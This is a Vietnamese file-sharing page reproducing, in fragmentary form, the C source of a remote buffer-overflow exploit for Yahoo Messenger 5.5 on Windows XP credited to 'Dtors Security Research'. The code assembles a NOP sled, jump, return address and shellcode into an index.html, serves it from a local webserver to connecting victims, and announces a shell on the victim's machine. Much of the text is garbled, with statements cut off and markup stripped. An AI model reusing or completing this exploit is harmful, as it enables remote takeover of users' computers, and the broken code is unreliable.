Remote Yahoo Messenger V5.5 Exploiter

Chia sẻ: Ai Dieu | Ngày: | Loại File: DOC | Số trang:6

Thêm vào BST

Báo xấu

70
lượt xem 6
download

Download Vui lòng tải xuống để xem tài liệu đầy đủ

Remote Yahoo Messenger V5.5 Exploiter

Chủ đề:

Bình luận(0) Đăng nhập để gửi bình luận!

Lưu

Nội dung Text: Remote Yahoo Messenger V5.5 Exploiter

Remote Yahoo Messenger V5.5 Exploiter trang này đã được đọc lần * [ Remote yahoo Messenger V5.5 exploiter on Windows XP ] * Dtors Security Research (DSR) * Code by: Rave * The buffer looks like this * |
printf("\n\t\t\n"); printf("\t\t\t\tDtors Security Research (DSR) \n"); printf("\t\t\t\tCode by: Rave\n"); printf("\t\t\t\tMail: rave@dtors.net\n"); printf("\t\t\n\n"); /* Modify here to add your usage message when the program is * called without arguments */ printf("\t\t\n\n"); fprintf(stdout,"\t\tP local webserver server portnumber\n"); fprintf(stdout,"\t\tg greatz to:\n\n\n\n\n"); printf("\t\t\n\n"); } /* returns the index of the first argument that is not an option; i.e. does not start with a dash or a slash */ int HandleOptions(int argc,char *argv[]) { int i,firstnonoption=0; for (i=1; i
default: fprintf(stderr,"unknown option %s\n",argv[i]); break; } } else { firstnonoption = i; break; } } return firstnonoption; } int main(int argc,char *argv[]) { FILE *fptr; unsigned char buffer[5000]; int offset=320; //
} else { fprintf(stderr,"Done\n"); } // memseting the buffers for preperation memset(sd,0x00,MAXDATASIZE); memset(buffer,0x00,offset+32+strlen(shellcode)); memset(buffer,0x90,offset); // whe place the a jmp ebp+0x3 instuction inside the buffer // to jump over the eip changing bytes at the en offset // // jmp 0x3 // |____________^ buffer[offset4]=0xeb; buffer[offset3]=0x03; memcpy(buffer+offset,sraddress,4); memcpy(buffer+offset+4,shellcode,strlen(shellcode)); // here whe make the index.html // whe open it again if some one connects to the exploiting server // and send it over to the victim. fprintf(fptr,"",0x22,0x22); fprintf(fptr,""); fprintf(fptr,"Oohhh my god exploited\n"); fprintf(fptr,"",0x22,0x22); fprintf(fptr,""); fprintf(fptr,"", 0x22,0x22,0x22,0x22,0x22,0x22); fprintf(fptr,"Dtors Security Research (DSR)\n"); fprintf(fptr,"Yah000 Messager Version 5.5 exploit....\n"); fprintf(fptr,""); fprintf(fptr,"Contach heaven\x00\x00\x00",0x22,buffer,0x22); fprintf(fptr,".... \x00\x00\x00",0x22,0x22);
fclose(fptr); //
inet_ntoa(client.sin_addr),he>h_name); /* prints client's IP */ fprintf(stdout,"\nOpening index.html for remote user: "); if ((fptr =fopen("index.html","r"))==NULL){ fprintf(stderr,"Failed\n"); exit(1); } else { fprintf(stderr,"Done\n"); } fprintf(stdout,"Sending the overflow string... "); // reading the index.html file and sending its // contents to the connected victim while (!feof(fptr)) { send(fd2,sd,strlen(sd),0); numbytes=fread(sd,sizeof(char),MAXDATASIZE,fptr); sd[numbytes * sizeof(char)]='\0'; } send(fd2,sd,strlen(sd),0); printf("\n\n\nExploit Done....\n\n\n"); printf("A shell is started @ %s lol\n\n\nPress any key to exit the exploit",inet_ntoa(client.sin_addr),he>h_name); gets(sd); exit(0); } return 0; }